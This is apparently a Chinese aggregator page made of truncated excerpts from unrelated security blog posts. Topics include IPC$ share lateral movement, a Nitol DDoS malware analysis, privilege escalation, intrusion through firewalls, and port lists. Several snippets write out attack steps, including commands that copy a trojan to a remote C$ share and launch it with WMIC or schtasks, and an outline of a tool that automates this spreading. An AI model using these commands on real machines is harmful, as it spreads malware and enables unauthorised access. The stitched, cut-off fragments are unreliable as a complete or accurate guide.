要实现代码例如以下: ///////////////////////////////////////////////////////////////////////////////////// typedef struct TagHost { CString host; CString user; CString pass; CString filename; CString LocalFilePath; CListBox* list; }IPC; void CShareDlg::OnStart…

思路 IPC$横向渗透的方法,也是病毒常用的扩散方法. 1.建立连接 2.复制文件到共享中C$.D$.E$.F$ 3.获取服务器的时间 3.设定计划任务按时间执行 用到的Windows API 建立网络驱动器 WNetAddConnection2() WNetAddConnection2W( _In_ LPNETRESOURCEW lpNetResource, // 资源信息 _In_opt_ LPCWSTR lpPassword, // 密码 _In_opt_ LPCWSTR lpUserNa…

http://blog.csdn.net/qq1084283172/article/details/49305827 一.样本信息 文件名称:803c617e665ff7e0318386e24df63038 文件大小:61KB 病毒名称:DDoS/Nitol.A.1562 MD5:803c617e665ff7e0318386e24df63038 Sha-1:e05277aafd161470b020e9e8d2aa2dcb9759328c 二.样本行为 0x1.打开与当前病毒进程文件同名的信号互斥…

copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe” schtasks计划任务远程运行 schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st…

用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\computer][/t xxx][/d [p|u:]xx:yy [/c "comment"]] 没有参数   显示帮助.这与键入 /? 是一样的.    /?         显示帮助.这与不键入任何选项是一样的.    /i         显示图形用户界面(GUI).             …

介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问. 四种默认共享: 共享名------资源----------------------注解 C$-----------C:------------------------默认共享 D$-----------D:-----------…

Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 17|每日引用 18|消息发送协议 19|字符发生器 20|FTP文件传输协议(默认数据口) 21|FTP文件传输协议(控制) 22|SSH远程登录协议 23|telnet(终端仿真协议),木马Tiny Telnet Server开放此端口 24|预留给个人用邮件系统 25|SMTP服务器所开放的端…

本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更高的状态.但并不是说这种漏洞不严重.难以利用,往往这种漏洞更容易被利用.带来的后果比远程漏洞更可怕,这种漏洞实际上远比远程漏洞稀有,往往一个微软本地提权漏洞在国外的价格就可以到几百万美金.因为远程漏洞其实是很普遍的,一个网站存在网页问题,就可能被篡改,传入WEBSHELL(一种控制网站机器…

本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透过防火墙查看是否开有139端口.从上面得到的信息我们可以简单的判断到:主机A的系统是什么,装有防火墙的 话,一般是只允许80端口开放的.如果能够泄漏asp源文件,当然是最好不过的了,但是一般难得遇到.如果主机A有 show files之类的CGI漏洞,我们就可以试着看能不能从conn.inc等可能存…

在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义port,通常它指的是TCP/IP协议 port,port从数字范围0至65535,比方用于浏览网页服务. 查看port 在windows 2000/XP/Server 2003中要查看port.能够使用Netstat命令: 依次点击“開始→执行”.键入“cmd”并回车.打开命令提示符窗体. 在命令提…